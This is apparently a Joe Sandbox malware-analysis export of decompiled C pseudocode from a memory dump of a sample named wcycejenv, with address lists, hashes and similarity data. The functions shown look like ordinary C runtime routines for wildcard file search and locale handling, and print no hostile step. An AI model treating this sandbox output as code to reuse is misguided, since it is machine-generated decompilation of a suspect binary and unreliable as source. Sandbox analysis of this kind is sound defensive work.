																		_t279 = E0043D737(_t504 + _t478, _t368, _v4);
																		_t522 = _t521 + 0x10;
																		__eflags = _t279;
																		if(_t279 != 0) {
																			goto L78;
																		} else {
																			_t377 = _a8;
																			_t335 = E00431BF0(_t377);
																			_v16 = _t335;
																			__eflags = _t335;
																			if(_t335 == 0) {
																				 *(_t377[1]) = _t504;
																				_t508 = 0;
																				_t148 =  &(_t377[1]);
																				 *_t148 = _t377[1] + 4;
																				__eflags =  *_t148;
																			} else {
																				E0042E2C2(_t504);
																				_t508 = _v16;
																			}
																			E0042E2C2(0);
																			_t338 = _t508;
																			goto L70;
																		}
																	} else {
																		_push(_t478);
																		_t340 = E0043D737(_t504, _t368, _v0);
																		_t522 = _t521 + 0x10;
																		__eflags = _t340;
																		if(_t340 != 0) {
																			L78:
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			E0042C03B();
																			asm("int3");
																			_push(_t514);
																			_t515 = _t522;
																			_push(_t407);
																			_t408 = _v200;
																			_push(_t368);
																			_push(0);
																			__eflags = 0;
																			_t151 = _t408 + 2; // 0x2
																			_t466 = _t151;
																			do {
																				_t281 =  *_t408;
																				_t408 = _t408 + 2;
																				__eflags = _t281;
																			} while (_t281 != 0);
																			_t480 = _v0;
																			_t411 = (_t408 - _t466 >> 1) + 1;
																			_v20 = _t411;
																			__eflags = _t411 -  !_t480;
																			if(_t411 <=  !_t480) {
																				_push(_t504);
																				_t154 = _t480 + 1; // 0x1
																				_t371 = _t154 + _t411;
																				_t505 = E00430BC8(_t371, 2);
																				__eflags = _t480;
																				if(_t480 == 0) {
																					L86:
																					_push(_v20);
																					_t371 = _t371 - _t480;
																					_t286 = E00430A09(_t505 + _t480 * 2, _t371, _v8);
																					_t523 = _t522 + 0x10;
																					__eflags = _t286;
																					if(_t286 != 0) {
																						goto L91;
																					} else {
																						_t483 = _a4;
																						_t375 = E00431C77(_t483);
																						__eflags = _t375;
																						if(_t375 == 0) {
																							 *((intOrPtr*)( *((intOrPtr*)(_t483 + 4)))) = _t505;
																							 *((intOrPtr*)(_t483 + 4)) =  *((intOrPtr*)(_t483 + 4)) + 4;
																							_t375 = 0;
																							__eflags = 0;
																						} else {
																							E0042E2C2(_t505);
																						}
																						E0042E2C2(0);
																						_t332 = _t375;
																						goto L83;
																					}
																				} else {
																					_push(_t480);
																					_t334 = E00430A09(_t505, _t371, _v4);
																					_t523 = _t522 + 0x10;
																					__eflags = _t334;
																					if(_t334 != 0) {
																						L91:
																						_push(0);
																						_push(0);
																						_push(0);
																						_push(0);
																						_push(0);
																						E0042C03B();
																						asm("int3");
																						_push(_t515);
																						_t516 = _t523;
																						_t524 = _t523 - 0x298;
																						_t289 =  *0x454264; // 0x8c4320d5
																						_v252 = _t289 ^ _t516;
																						_t414 = _v236;
																						_t467 = _v232;
																						_push(_t371);
																						_push(_t480);
																						_t481 = _v240;
																						_v852 = _t467;
																						__eflags = _t414 - _t481;
																						if(_t414 != _t481) {
																							while(1) {
																								_t327 =  *_t414;
																								__eflags = _t327 - 0x2f;
																								if(_t327 == 0x2f) {
																									break;
																								}
																								__eflags = _t327 - 0x5c;
																								if(_t327 != 0x5c) {
																									__eflags = _t327 - 0x3a;
																									if(_t327 != 0x3a) {
																										_t414 = E0043D790(_t481, _t414);
																										__eflags = _t414 - _t481;
																										if(_t414 != _t481) {
																											continue;
																										}
																									}
																								}
																								break;
																							}
																							_t467 = _v624;
																						}
																						_t291 =  *_t414;
																						_v617 = _t291;
																						__eflags = _t291 - 0x3a;
																						if(_t291 != 0x3a) {
																							L102:
																							_t372 = 0;
																							__eflags = _t291 - 0x2f;
																							if(__eflags == 0) {
																								L105:
																								_t292 = 1;
																							} else {
																								__eflags = _t291 - 0x5c;
																								if(__eflags == 0) {
																									goto L105;
																								} else {
																									__eflags = _t291 - 0x3a;
																									_t292 = 0;
																									if(__eflags == 0) {
																										goto L105;
																									}
																								}
																							}
																							_v684 = _t372;
																							_v680 = _t372;
																							_push(_t505);
																							asm("sbb eax, eax");
																							_v676 = _t372;
																							_v672 = _t372;
																							_v652 =  ~(_t292 & 0x000000ff) & _t414 - _t481 + 0x00000001;
																							_v668 = _t372;
																							_v664 = _t372;
																							_t298 = E00430DD6(_t414 - _t481 + 1, _t481,  &_v684, E00431A19(_t467, __eflags));
																							_t525 = _t524 + 0xc;
																							asm("sbb eax, eax");
																							_t302 = FindFirstFileExW( !( ~_t298) & _v676, _t372,  &_v616, _t372, _t372, _t372);
																							_t506 = _t302;
																							__eflags = _t506 - 0xffffffff;
																							if(_t506 != 0xffffffff) {
																								_t419 =  *((intOrPtr*)(_v624 + 4)) -  *_v624;
																								__eflags = _t419;
																								_v656 = _t419 >> 2;
																								do {
																									_v648 = _t372;
																									_v644 = _t372;
																									_v640 = _t372;
																									_v636 = _t372;
																									_v632 = _t372;
																									_v628 = _t372;
																									_t308 = E00430D07( &(_v616.cFileName),  &_v648,  &_v617, E00431A19(_t467, __eflags));
																									_t525 = _t525 + 0x10;
																									asm("sbb eax, eax");
																									_t311 =  !( ~_t308) & _v640;
																									__eflags =  *_t311 - 0x2e;
																									if( *_t311 != 0x2e) {
																										L113:
																										_push(_v624);
																										_push(_v652);
																										_push(_t481);
																										_push(_t311);
																										L66();
																										_t525 = _t525 + 0x10;
																										_v660 = _t311;
																										__eflags = _t311;
																										if(_t311 != 0) {
																											__eflags = _v628 - _t372;
																											if(_v628 != _t372) {
																												E0042E2C2(_v640);
																												_t311 = _v660;
																											}
																											_t372 = _t311;
																										} else {
																											goto L114;
																										}
																									} else {
																										_t425 =  *((intOrPtr*)(_t311 + 1));
																										__eflags = _t425;
																										if(_t425 == 0) {
																											L114:
																											__eflags = _v628 - _t372;
																											if(_v628 != _t372) {
																												E0042E2C2(_v640);
																											}
																											goto L116;
																										} else {
																											__eflags = _t425 - 0x2e;
																											if(_t425 != 0x2e) {
																												goto L113;
																											} else {
																												__eflags =  *((intOrPtr*)(_t311 + 2)) - _t372;
																												if( *((intOrPtr*)(_t311 + 2)) == _t372) {
																													goto L114;
																												} else {
																													goto L113;
																												}
																											}
																										}
																									}
																									L122:
																									FindClose(_t506);
																									goto L123;
																									L116:
																									__eflags = FindNextFileW(_t506,  &_v616);
																								} while (__eflags != 0);
																								_t319 = _v624;
																								_t427 = _v656;
																								_t467 =  *_t319;
																								_t322 =  *((intOrPtr*)(_t319 + 4)) -  *_t319 >> 2;
																								__eflags = _t427 - _t322;
																								if(_t427 != _t322) {
																									E0043D240(_t467, _t467 + _t427 * 4, _t322 - _t427, 4, E00430C25);
																								}
																								goto L122;
																							} else {
																								_push(_v624);
																								_push(_t372);
																								_push(_t372);
																								_push(_t481);
																								L66();
																								_t372 = _t302;
																							}
																							L123:
																							__eflags = _v664;
																							_pop(_t505);
																							if(_v664 != 0) {
																								E0042E2C2(_v676);
																							}
																							_t313 = _t372;
																						} else {
																							_t313 = _t481 + 1;
																							__eflags = _t414 - _t481 + 1;
																							if(_t414 == _t481 + 1) {
																								_t291 = _v617;
																								goto L102;
																							} else {
																								_push(_t467);
																								_push(0);
																								_push(0);
																								_push(_t481);
																								L66();
																							}
																						}
																						_pop(_t482);
																						__eflags = _v24 ^ _t516;
																						_pop(_t373);
																						return E004085C2(_t313, _t373, _v24 ^ _t516, _t467, _t482, _t505);
																					} else {
																						goto L86;
																					}
																				}
																			} else {
																				_t332 = 0xc;
																				L83:
																				return _t332;
																			}
																		} else {
																			goto L73;
																		}
																	}
																} else {
																	_t338 = 0xc;
																	L70:
																	return _t338;
																}
															} else {
																goto L56;
															}
															goto L127;
															L56:
															_t341 = _v28;
															_t468 = _v36;
															 *((intOrPtr*)(_v20 + _t341)) = _t468;
															_t255 = _t341 + 4;
															_v28 = _t255;
															_t464 = _t468 + _v32 * 2;
															_v36 = _t464;
															__eflags = _t255 - _v48;
														} while (_t255 != _v48);
														goto L57;
													}
												} else {
													_t501 = _t500 | 0xffffffff;
													_v24 = _t500 | 0xffffffff;
													L58:
													E0042E2C2(_t477);
													_pop(_t388);
													goto L59;
												}
											} else {
												while(1) {
													_t441 = 0x2a;
													_v20 = _t441;
													_t442 = 0x3f;
													_v18 = _t442;
													_v16 = 0;
													_t349 = E00413B12(_t247,  &_v20);
													_t388 =  *_t496;
													__eflags = _t349;
													if(_t349 != 0) {
														_t350 = E004315E3(_t388, _t349,  &(_v616.cAlternateFileName));
														_t520 = _t520 + 0xc;
														_v24 = _t350;
														_t501 = _t350;
													} else {
														_t351 =  &(_v616.cAlternateFileName);
														_push(_t351);
														_push(_t477);
														_push(_t477);
														_push(_t388);
														L79();
														_t501 = _t351;
														_t520 = _t520 + 0x10;
														_v24 = _t501;
													}
													__eflags = _t501;
													if(_t501 != 0) {
														break;
													}
													_t496 = _v28 + 4;
													_v28 = _t496;
													_t247 =  *_t496;
													__eflags = _t247;
													if(_t247 != 0) {
														continue;
													} else {
														_t366 = _v616.cAlternateFileName;
														_t387 = _v48;
														goto L42;
													}
													goto L127;
												}
												_t366 = _v616.cAlternateFileName;
												L59:
												_t460 = _t366;
												_v40 = _t460;
												__eflags = _v48 - _t460;
												asm("sbb ecx, ecx");
												_t390 =  !_t388 & _v48 - _t460 + 0x00000003 >> 0x00000002;
												__eflags = _t390;
												_v20 = _t390;
												if(_t390 != 0) {
													_t503 = _t390;
													do {
														E0042E2C2( *_t366);
														_t477 = _t477 + 1;
														_t366 = _t366 + 4;
														__eflags = _t477 - _t503;
													} while (_t477 != _t503);
													_t366 = _v616.cAlternateFileName;
													_t501 = _v24;
												}
												E0042E2C2(_t366);
												_pop(_t475);
												_pop(_t364);
												goto L64;
											}
										} else {
											_t352 = E0042C135(__eflags);
											_t501 = 0x16;
											 *_t352 = _t501;
											E0042C00E();
											L64:
											__eflags = _v12 ^ _t513;
											_pop(_t502);
											return E004085C2(_t501, _t364, _v12 ^ _t513, _t460, _t475, _t502);
										}
									} else {
										goto L23;
									}
									goto L127;
									L23:
									_t354 = _v12;
									_t447 = _v16;
									 *((intOrPtr*)(_v32 + _t354)) = _t447;
									_t225 = _t354 + 4;
									_t381 = _t447 + _v20;
									_v16 = _t447 + _v20;
									_v12 = _t225;
									__eflags = _t225 - _v40;
								} while (_t225 != _v40);
								goto L24;
							}
						} else {
							_t493 = _t492 | 0xffffffff;
							_v12 = _t493;
							L25:
							E0042E2C2(_t364);
							_pop(_t382);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t364;
							_t359 = E0043D750(_t217,  &_v8);
							_t382 =  *_t488;
							__eflags = _t359;
							if(_t359 != 0) {
								_push( &_v44);
								_push(_t359);
								_push(_t382);
								L92();
								_t518 = _t518 + 0xc;
								_v12 = _t359;
								_t493 = _t359;
							} else {
								_t360 =  &_v44;
								_push(_t360);
								_push(_t364);
								_push(_t364);
								_push(_t382);
								L66();
								_t493 = _t360;
								_t518 = _t518 + 0x10;
								_v12 = _t493;
							}
							__eflags = _t493;
							if(_t493 != 0) {
								break;
							}
							_t488 = _a4 + 4;
							_a4 = _t488;
							_t217 =  *_t488;
							__eflags = _t217;
							if(_t217 != 0) {
								continue;
							} else {
								_t475 = _v44;
								_t380 = _v40;
								goto L9;
							}
							goto L127;
						}
						_t475 = _v44;
						L26:
						_t456 = _t475;
						_v32 = _t456;
						__eflags = _v40 - _t456;
						asm("sbb ecx, ecx");
						_t384 =  !_t382 & _v40 - _t456 + 0x00000003 >> 0x00000002;
						__eflags = _t384;
						_v28 = _t384;
						if(_t384 != 0) {
							_t495 = _t384;
							do {
								E0042E2C2( *_t475);
								_t364 = _t364 + 1;
								_t475 = _t475 + 4;
								__eflags = _t364 - _t495;
							} while (_t364 != _t495);
							_t475 = _v44;
							_t493 = _v12;
						}
						E0042E2C2(_t475);
						goto L31;
					}
				} else {
					_t361 = E0042C135(_t529);
					_t493 = 0x16;
					 *_t361 = _t493;
					E0042C00E();
					L31:
					return _t493;
				}
				L127:
			}

0x00430e15
0x00430e18
0x00430e1b
0x00430e1c
0x00430e1e
0x00430e34
0x00430e38
0x00430e3b
0x00430e3d
0x00430e3f
0x00430e41
0x00430e43
0x00430e46
0x00430e49
0x00430e4c
0x00430e4e
0x00430eb1
0x00430eb3
0x00430eb6
0x00430eb8
0x00430ebc
0x00430ec5
0x00430ec6
0x00430ec9
0x00430ecb
0x00430ece
0x00430ed2
0x00430ed2
0x00430ed4
0x00430ed6
0x00430ed8
0x00430eda
0x00430eda
0x00430edc
0x00430edf
0x00430ee2
0x00430ee2
0x00430ee4
0x00430ee5
0x00430ee5
0x00430ef0
0x00430ef2
0x00430ef5
0x00430ef6
0x00430ef9
0x00430ef9
0x00430efd
0x00430f00
0x00430f03
0x00430f03
0x00430f03
0x00430f10
0x00430f12
0x00430f15
0x00430f17
0x00430f2f
0x00430f32
0x00430f35
0x00430f37
0x00430f3a
0x00430f3c
0x00430f3f
0x00430f42
0x00430f9f
0x00430fa2
0x00430fa5
0x00430fa7
0x00000000
0x00430f44
0x00430f46
0x00430f46
0x00430f48
0x00430f4b
0x00430f4b
0x00430f4d
0x00430f4f
0x00430f55
0x00430f58
0x00430f58
0x00430f5a
0x00430f5b
0x00430f5b
0x00430f5f
0x00430f62
0x00430f65
0x00430f69
0x00430f76
0x00430f7b
0x00430f7e
0x00430f80
0x00430ff4
0x00430ff5
0x00430ff6
0x00430ff7
0x00430ff8
0x00430ff9
0x00430ffe
0x00431002
0x00431004
0x00431007
0x0043100e
0x00431011
0x00431014
0x00431017
0x00431018
0x0043101b
0x0043101e
0x00431020
0x00431036
0x00431037
0x00431038
0x0043103a
0x0043103c
0x0043103e
0x00431040
0x00431042
0x00431045
0x00431048
0x0043104b
0x0043104d
0x004310bb
0x004310bd
0x004310c0
0x004310c2
0x004310c6
0x004310cf
0x004310d0
0x004310d3
0x004310d5
0x004310d8
0x004310dc
0x004310dc
0x004310de
0x004310e0
0x004310e2
0x004310e4
0x004310e4
0x004310e6
0x004310e9
0x004310ec
0x004310ec
0x004310ef
0x004310f2
0x004310f2
0x00431102
0x00431108
0x0043110b
0x0043110c
0x0043110f
0x0043110f
0x00431113
0x00431113
0x00431121
0x00431123
0x00431126
0x00431128
0x00431140
0x00431143
0x00431146
0x00431148
0x0043114b
0x0043114d
0x00431150
0x00431153
0x004311bd
0x004311c0
0x004311c3
0x004311c5
0x00000000
0x00431155
0x00431157
0x00431157
0x00431159
0x0043115c
0x0043115c
0x0043115e
0x00431160
0x00431166
0x00431169
0x00431169
0x0043116c
0x0043116f
0x0043116f
0x00431179
0x00431181
0x00431185
0x0043118b
0x00431191
0x00431196
0x00431199
0x0043119b
0x0043121c
0x0043121d
0x0043121e
0x0043121f
0x00431220
0x00431221
0x00431226
0x00431229
0x0043122a
0x0043122c
0x0043122d
0x00431230
0x00431230
0x00431233
0x00431233
0x00431235
0x00431236
0x00431236
0x0043123a
0x0043123b
0x00431242
0x00431245
0x00431248
0x0043124a
0x00431252
0x00431254
0x00431257
0x00431261
0x00431264
0x00431265
0x00431267
0x0043127b
0x0043127b
0x0043127e
0x00431288
0x0043128d
0x00431290
0x00431292
0x00000000
0x00431294
0x00431294
0x00431299
0x004312a0
0x004312a3
0x004312a5
0x004312b6
0x004312b8
0x004312ba
0x004312ba
0x004312ba
0x004312a7
0x004312a8
0x004312ad
0x004312b0
0x004312bf
0x004312c5
0x00000000
0x004312c8
0x00431269
0x00431269
0x0043126f
0x00431274
0x00431277
0x00431279
0x004312cb
0x004312cd
0x004312ce
0x004312cf
0x004312d0
0x004312d1
0x004312d2
0x004312d7
0x004312da
0x004312db
0x004312dd
0x004312de
0x004312e1
0x004312e2
0x004312e3
0x004312e5
0x004312e5
0x004312e8
0x004312e8
0x004312eb
0x004312ee
0x004312ee
0x004312f3
0x004312fc
0x004312ff
0x00431302
0x00431304
0x0043130d
0x0043130e
0x00431311
0x0043131b
0x0043131f
0x00431321
0x00431335
0x00431335
0x00431338
0x00431342
0x00431347
0x0043134a
0x0043134c
0x00000000
0x0043134e
0x0043134e
0x00431358
0x0043135a
0x0043135c
0x0043136a
0x0043136c
0x00431370
0x00431370
0x0043135e
0x0043135f
0x00431364
0x00431374
0x0043137a
0x00000000
0x0043137c
0x00431323
0x00431323
0x00431329
0x0043132e
0x00431331
0x00431333
0x0043137f
0x00431381
0x00431382
0x00431383
0x00431384
0x00431385
0x00431386
0x0043138b
0x0043138e
0x0043138f
0x00431391
0x00431397
0x0043139e
0x004313a1
0x004313a4
0x004313a7
0x004313a8
0x004313a9
0x004313ac
0x004313b2
0x004313b4
0x004313b6
0x004313b6
0x004313b8
0x004313ba
0x00000000
0x00000000
0x004313bc
0x004313be
0x004313c0
0x004313c2
0x004313cd
0x004313cf
0x004313d1
0x00000000
0x00000000
0x004313d1
0x004313c2
0x00000000
0x004313be
0x004313d3
0x004313d3
0x004313d9
0x004313db
0x004313e1
0x004313e3
0x00431405
0x00431405
0x00431407
0x00431409
0x00431415
0x00431415
0x0043140b
0x0043140b
0x0043140d
0x00000000
0x0043140f
0x0043140f
0x00431411
0x00431413
0x00000000
0x00000000
0x00431413
0x0043140d
0x0043141d
0x00431425
0x0043142b
0x0043142c
0x0043142e
0x00431436
0x0043143c
0x00431442
0x00431448
0x0043145c
0x00431461
0x0043146c
0x0043147c
0x00431482
0x00431484
0x00431487
0x004314aa
0x004314aa
0x004314af
0x004314b5
0x004314b5
0x004314bb
0x004314c1
0x004314c7
0x004314cd
0x004314d3
0x004314f4
0x004314f9
0x004314fe
0x00431502
0x00431508
0x0043150b
0x0043151e
0x0043151e
0x00431524
0x0043152a
0x0043152b
0x0043152c
0x00431531
0x00431534
0x0043153a
0x0043153c
0x0043159a
0x004315a0
0x004315a8
0x004315ad
0x004315b3
0x004315b4
0x00000000
0x00000000
0x00000000
0x0043150d
0x0043150d
0x00431510
0x00431512
0x0043153e
0x0043153e
0x00431544
0x0043154c
0x00431551
0x00000000
0x00431514
0x00431514
0x00431517
0x00000000
0x00431519
0x00431519
0x0043151c
0x00000000
0x00000000
0x00000000
0x00000000
0x0043151c
0x00431517
0x00431512
0x004315b6
0x004315b7
0x00000000
0x00431552
0x00431560
0x00431560
0x00431568
0x0043156e
0x00431574
0x0043157b
0x0043157e
0x00431580
0x00431590
0x00431595
0x00000000
0x00431489
0x00431489
0x0043148f
0x00431490
0x00431491
0x00431492
0x0043149a
0x0043149a
0x004315bd
0x004315bd
0x004315c4
0x004315c5
0x004315cd
0x004315d2
0x004315d3
0x004313e5
0x004313e5
0x004313e8
0x004313ea
0x004313ff
0x00000000
0x004313ec
0x004313ec
0x004313ef
0x004313f0
0x004313f1
0x004313f2
0x004313f7
0x004313ea
0x004315d8
0x004315d9
0x004315db
0x004315e2
0x00000000
0x00000000
0x00000000
0x00431333
0x00431306
0x00431308
0x00431309
0x0043130c
0x0043130c
0x00000000
0x00000000
0x00000000
0x00431279
0x0043124c
0x0043124e
0x0043124f
0x00431251
0x00431251
0x00000000
0x00000000
0x00000000
0x00000000
0x0043119d
0x0043119d
0x004311a3
0x004311a6
0x004311a9
0x004311af
0x004311b2
0x004311b5
0x004311b8
0x004311b8
0x00000000
0x0043115c
0x0043112a
0x0043112a
0x0043112d
0x004311c7
0x004311c8
0x004311cd
0x00000000
0x004311cd
0x0043104f
0x0043104f
0x00431051
0x00431052
0x00431058
0x00431059
0x0043105f
0x00431068
0x0043106f
0x00431071
0x00431073
0x00431091
0x00431096
0x00431099
0x0043109c
0x00431075
0x00431075
0x00431078
0x00431079
0x0043107a
0x0043107b
0x0043107c
0x00431081
0x00431083
0x00431086
0x00431086
0x0043109e
0x004310a0
0x00000000
0x00000000
0x004310a9
0x004310ac
0x004310af
0x004310b1
0x004310b3
0x00000000
0x004310b5
0x004310b5
0x004310b8
0x00000000
0x004310b8
0x00000000
0x004310b3
0x00431135
0x004311ce
0x004311d1
0x004311d5
0x004311de
0x004311e1
0x004311e5
0x004311e5
0x004311e7
0x004311ea
0x004311ec
0x004311ee
0x004311f0
0x004311f5
0x004311f6
0x004311fa
0x004311fa
0x004311fe
0x00431201
0x00431201
0x00431205
0x0043120b
0x0043120c
0x00000000
0x0043120c
0x00431022
0x00431022
0x00431029
0x0043102a
0x0043102c
0x0043120d
0x00431212
0x00431214
0x0043121b
0x0043121b
0x00000000
0x00000000
0x00000000
0x00000000
0x00430f82
0x00430f82
0x00430f88
0x00430f8b
0x00430f8e
0x00430f91
0x00430f94
0x00430f97
0x00430f9a
0x00430f9a
0x00000000
0x00430f4b
0x00430f19
0x00430f19
0x00430f1c
0x00430fa9
0x00430faa
0x00430faf
0x00000000
0x00430faf
0x00430e50
0x00430e50
0x00430e53
0x00430e5b
0x00430e5e
0x00430e65
0x00430e67
0x00430e69
0x00430e84
0x00430e85
0x00430e86
0x00430e87
0x00430e8c
0x00430e8f
0x00430e92
0x00430e6b
0x00430e6b
0x00430e6e
0x00430e6f
0x00430e70
0x00430e71
0x00430e72
0x00430e77
0x00430e79
0x00430e7c
0x00430e7c
0x00430e94
0x00430e96
0x00000000
0x00000000
0x00430e9f
0x00430ea2
0x00430ea5
0x00430ea7
0x00430ea9
0x00000000
0x00430eab
0x00430eab
0x00430eae
0x00000000
0x00430eae
0x00000000
0x00430ea9
0x00430f24
0x00430fb0
0x00430fb3
0x00430fb7
0x00430fc0
0x00430fc3
0x00430fc7
0x00430fc7
0x00430fc9
0x00430fcc
0x00430fce
0x00430fd0
0x00430fd2
0x00430fd7
0x00430fd8
0x00430fdc
0x00430fdc
0x00430fe0
0x00430fe3
0x00430fe3
0x00430fe7
0x00000000
0x00430fee
0x00430e20
0x00430e20
0x00430e27
0x00430e28
0x00430e2a
0x00430fef
0x00430ff3
0x00430ff3
0x00000000

APIs

_free.LIBCMT ref: 00430FAA

Strings

*?, xrefs: 00430E53

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 0af1d419d67b72c187e331b723e228f22dfcd636316e7838d4dbb06965a64c15
Instruction ID: 9674734b641d5c701a8b177cd3320524cd891bd1dc7153517c8243c260446eee
Opcode Fuzzy Hash: 0af1d419d67b72c187e331b723e228f22dfcd636316e7838d4dbb06965a64c15
Instruction Fuzzy Hash: F6E14A75E002199FCF24DFA9C8819EEBBF5EF4C314F14916AE815E7340D678AE418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042A560 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 285
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0042A560(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int* _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int* _v724;
				intOrPtr _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed short _v772;
				void* __ebp;
				signed int _t147;
				void* _t154;
				signed int _t155;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t162;
				signed int _t164;
				intOrPtr _t165;
				signed int _t168;
				signed int _t170;
				void* _t171;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				signed int _t181;
				signed int _t199;
				signed int _t201;
				signed int _t203;
				signed int _t208;
				signed int _t210;
				void* _t211;
				signed int _t218;
				intOrPtr* _t219;
				signed int _t228;
				intOrPtr _t231;
				intOrPtr* _t232;
				signed int _t234;
				signed int* _t238;
				signed int _t239;
				intOrPtr _t246;
				void* _t247;
				void* _t250;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int* _t258;
				intOrPtr* _t259;
				short _t260;
				signed int _t261;
				void* _t263;
				void* _t264;
				void* _t265;

				_t244 = __edx;
				_t147 =  *0x454264; // 0x8c4320d5
				_v8 = _t147 ^ _t261;
				_push(__ebx);
				_t210 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v736 = _t210;
				_v724 = E0042DA10(__ecx, __edx) + 0x278;
				_t154 = E004299E7(__edx, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v712);
				_t264 = _t263 + 0x18;
				if(_t154 == 0) {
					L39:
					_t155 = 0;
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t210 + 2; // 0x2
					_t252 = _t10 << 4;
					_t157 =  &_v272;
					_v716 = _t252;
					_t244 =  *(_t252 + _t246);
					_t218 = _t244;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t254 = _v716;
						if( *_t157 !=  *_t218) {
							break;
						}
						if( *_t157 == 0) {
							L6:
							_t158 = _v704;
						} else {
							_t260 =  *((intOrPtr*)(_t157 + 2));
							_v706 = _t260;
							_t254 = _v716;
							if(_t260 !=  *((intOrPtr*)(_t218 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t218 = _t218 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t158 != 0) {
							_t219 =  &_v272;
							_t244 = _t219 + 2;
							do {
								_t159 =  *_t219;
								_t219 = _t219 + 2;
								__eflags = _t159 - _v704;
							} while (_t159 != _v704);
							_v720 = (_t219 - _t244 >> 1) + 1;
							_t162 = E0042E2FC(4 + ((_t219 - _t244 >> 1) + 1) * 2);
							_v732 = _t162;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L39;
							} else {
								_v728 =  *((intOrPtr*)(_t254 + _t246));
								_v740 =  *(_t246 + 0xa0 + _t210 * 4);
								_v744 =  *(_t246 + 8);
								_v708 = _t162 + 4;
								_t164 = E004308DA(_t162 + 4, _v720,  &_v272);
								_t265 = _t264 + 0xc;
								__eflags = _t164;
								if(_t164 != 0) {
									_t165 = _v728;
									_push(_t165);
									_push(_t165);
									_push(_t165);
									_push(_t165);
									_push(_t165);
									E0042C03B();
									asm("int3");
									_push(_t261);
									_t168 = (_v772 & 0x0000ffff) - 0x2d;
									__eflags = _t168;
									if(_t168 == 0) {
										L51:
										__eflags = 0;
										return 0;
									} else {
										_t170 = _t168 - 1;
										__eflags = _t170;
										if(_t170 == 0) {
											_t171 = 2;
											return _t171;
										} else {
											__eflags = _t170 == 0x31;
											if(_t170 == 0x31) {
												goto L51;
											} else {
												__eflags = 1;
												return 1;
											}
										}
									}
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t254 + _t246)) = _v708;
									if(_v272 != 0x43) {
										L17:
										_t177 = E00429689(_t210, _t246,  &_v700);
										_t228 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t228 = _v704;
											_t177 = _t228;
										}
									}
									 *(_t246 + 0xa0 + _t210 * 4) = _t177;
									__eflags = _t210 - 2;
									if(_t210 != 2) {
										__eflags = _t210 - 1;
										if(_t210 != 1) {
											__eflags = _t210 - 5;
											if(_t210 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v712;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v712;
										}
									} else {
										_t258 = _v724;
										_t244 = _t228;
										_t238 = _t258;
										 *(_t246 + 8) = _v712;
										_v708 = _t258;
										_v720 = _t258[8];
										_v712 = _t258[9];
										while(1) {
											__eflags =  *(_t246 + 8) -  *_t238;
											if( *(_t246 + 8) ==  *_t238) {
												break;
											}
											_t259 = _v708;
											_t244 = _t244 + 1;
											_t208 =  *_t238;
											 *_t259 = _v720;
											_v712 = _t238[1];
											_t238 = _t259 + 8;
											 *((intOrPtr*)(_t259 + 4)) = _v712;
											_t210 = _v736;
											_t258 = _v724;
											_v720 = _t208;
											_v708 = _t238;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t199 = E00435592(_t244, __eflags, _v704, 1, 0x44a8b8, 0x7f,  &_v528,  *(_t246 + 8), 1);
												_t265 = _t265 + 0x1c;
												__eflags = _t199;
												if(_t199 == 0) {
													_t239 = _v704;
												} else {
													_t201 = _v704;
													do {
														 *(_t261 + _t201 * 2 - 0x20c) =  *(_t261 + _t201 * 2 - 0x20c) & 0x000001ff;
														_t201 = _t201 + 1;
														__eflags = _t201 - 0x7f;
													} while (_t201 < 0x7f);
													_t203 = E00445713( &_v528,  *0x454290, 0xfe);
													_t265 = _t265 + 0xc;
													__eflags = _t203;
													_t239 = 0 | _t203 == 0x00000000;
												}
												_t258[1] = _t239;
												 *_t258 =  *(_t246 + 8);
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L37;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v720;
											 *(_t258 + 4 + _t244 * 8) = _v712;
										}
										goto L25;
									}
									L37:
									_t178 = _t210 * 0xc;
									_t106 = _t178 + 0x44a940; // 0x428ec9
